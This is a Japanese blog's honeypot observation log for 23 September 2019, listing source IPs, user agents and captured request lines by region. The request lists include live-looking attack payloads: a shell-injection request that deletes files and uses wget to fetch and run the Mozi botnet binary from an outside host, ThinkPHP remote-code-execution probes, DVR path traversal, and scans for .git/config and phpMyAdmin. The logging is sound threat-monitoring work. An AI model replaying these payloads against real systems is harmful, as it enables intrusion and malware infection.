コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2019/09/23 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2019/09/23分です。

特徴
Region:AP

HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
42[.]227[.]154[.]34に関する不正通信
を確認しました。

Region:US

ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
zgrabによるスキャン行為
を確認しました。

Region:EU

ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
を確認しました。

アクセス数推移

AP:総アクセス数:57 (前日比:+26)
US:総アクセス数:39 (前日比:-85)
EU:総アクセス数:22 (前日比:+8)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region:AP

送信元IPアドレス一覧

件数 送信元IPアドレス
2 104.248.21.85 United States
2 114.115.236.68 China
3 117.50.54.253 China
3 124.251.44.148 China
1 154.47.32.66 United States
1 159.203.197.17 United States
2 159.203.201.167 United States
2 159.203.201.204 United States
1 159.203.201.78 United States
1 171.67.70.80 United States
4 179.197.214.103 Brazil
1 185.234.218.52 Ireland
3 185.45.13.11 Romania
1 194.61.24.202 Netherlands
1 195.158.110.186 Malta
3 210.60.110.4 Taiwan
1 34.77.50.202 United States
1 35.189.254.19 United States
1 35.241.177.192 United States
2 37.210.67.16 Qatar
3 39.135.1.194 China
1 42.227.154.34 China
1 45.136.108.29 Russia
4 49.234.81.16 China
1 66.240.205.34 United States
1 66.249.69.12 United States
2 75.106.115.186 United States
1 88.5.120.250 Spain
1 92.63.194.3 Russia
6 94.141.169.68 Russia

UserAgent一覧

件数 UserAgent
15 -
6 Firefox 3.1
1 Go-http-client/1.1
1 Hello, world
3 internetwache.org v3.4
2 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C)
1 Mozilla/5.0
1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
3 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
12 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
9 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 -
3 GET /cm/ HTTP/1.1
1 GET /epgrec/do-record.sh HTTP/1.0
2 GET /epgrec/do-record.sh HTTP/1.1
1 GET /foltia/ HTTP/1.0
2 GET /foltia/ HTTP/1.1
3 GET /.git/config HTTP/1.1
1 GET /index.php HTTP/1.1
6 GET /manager/html HTTP/1.1
3 GET /manager/text/list HTTP/1.1
7 GET ../../mnt/custom/ProductDefinition HTTP
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /PSIA/index HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?busybox HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http://42[.]227[.]154[.]34:38760/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
4 GET /TP/index.php HTTP/1.1
4 GET /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
4 GET /TP/public/index.php HTTP/1.1
1 Gh0st\xad
2 HEAD / HTTP/1.1
1 \n
1 POST /TP/index.php?s=captcha HTTP/1.1
2 POST /upgrade.aspx?a1=a51599c6 HTTP/1.1
3 \x03
Region:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 104.248.21.85 United States
23 106.12.36.60 China
10 112.29.140.228 China
1 154.47.32.66 United States
1 159.203.201.23 United States
1 171.67.70.80 United States
1 194.61.24.202 Netherlands
1 35.195.70.238 United States

UserAgent一覧

件数 UserAgent
3 -
1 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C)
23 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1
1 -
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /cm/ HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /upgrade.aspx?a1=a51599c6 HTTP/1.1
1 \x03
Region:EU

送信元IPアドレス一覧

件数 送信元IPアドレス
1 104.248.21.85 United States
10 139.199.38.56 China
1 154.47.32.66 United States
1 159.203.193.244 United States
1 159.203.201.134 United States
1 171.67.70.80 United States
1 194.61.24.202 Netherlands
1 27.155.87.45 China
1 35.195.249.233 United States
1 77.240.252.70 Republic of Lithuania
2 80.211.144.201 Italy
1 92.63.194.3 Russia

UserAgent一覧

件数 UserAgent
4 -
1 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C)
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
3 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
3 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 GET /cm/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
2 GET /HNAP1/ HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET http://www[.]msftncsi[.]com/ncsi.txt HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 \n
1 POST /index.php?s=captcha HTTP/1.1
1 POST /upgrade.aspx?a1=a51599c6 HTTP/1.1
2 \x03